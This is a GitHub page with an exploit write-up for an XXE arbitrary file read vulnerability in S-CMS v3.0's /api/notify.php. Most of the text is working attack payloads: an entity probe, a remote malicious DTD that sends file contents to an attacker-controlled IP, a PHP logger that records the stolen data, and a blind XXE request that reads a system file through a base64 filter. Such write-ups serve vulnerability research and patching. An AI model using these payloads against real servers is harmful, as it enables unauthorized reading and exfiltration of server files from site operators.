Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

S-CMS v3.0 XXE Arbitrary File Read Vulnerability

Vulnerability environment: php5.3/5.4

The vulnerability is located in /api/notify.php, the key code is as follows:

The simplexml_load_string function directly interprets the xml passed in POST, and does not prohibit loading entities.

Note:

simplexml_load_string is the default parsing entity in the old version. In the new version, the entity is no longer parsed by default. You need to specify the third parameter LIBXML_NOENT, such as simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT)

XXE entity detection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY test "this is test">
]>
<root>&test;</root>

See if external entities are supported

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://192.168.211.129:7777">
]>
<r>&sp;</r>

Create a new evil.xml to be loaded remotely under the attacker server.

<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://192.168.211.129/xxe.php?file=%file;'>"> %payload;

Xxe.php is used to record the contents of the read file

<?php
file_put_contents("1.log", $_GET['file']."\n",FILE_APPEND) ;
?>

Blind XXE arbitrary file reading

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.211.129/evil.xml">
%dtd;
%send;
]>
<root></root>

Send the request, the attacker server will generate a 1.log file, and successfully read the file.